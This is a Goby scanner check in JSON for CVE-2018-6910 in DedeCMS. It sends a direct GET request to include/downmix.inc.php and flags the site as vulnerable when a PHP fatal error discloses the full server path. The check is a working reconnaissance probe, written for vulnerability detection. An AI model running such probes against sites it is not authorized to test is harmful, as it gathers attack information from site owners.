Goby/json/DedeCMS_InfoLeak_CVE_2018_6...

74 lines
2.7 KiB
JSON

{
"Name": "DedeCMS InfoLeak CVE-2018-6910",
"Level": "1",
"Tags": [
"infoleak"
],
"GobyQuery": "app=\"DedeCMS\"",
"Description": "远程攻击者可通过对include/downmix.inc.php或inc/inc_archives_functions.php文件发送直接请求利用该漏洞获取完整路径。",
"Product": "DedeCMS",
"Homepage": "http://www.dedecms.com/",
"Author": "aetkrad",
"Impact": "",
"Recommendation": "",
"References": [],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/include/downmix.inc.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Fatal error",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "downmix.inc.php",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Call to undefined function helper()",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"PostTime": "2021-11-14 16:43:48",
"GobyVersion": "1.8.302"
}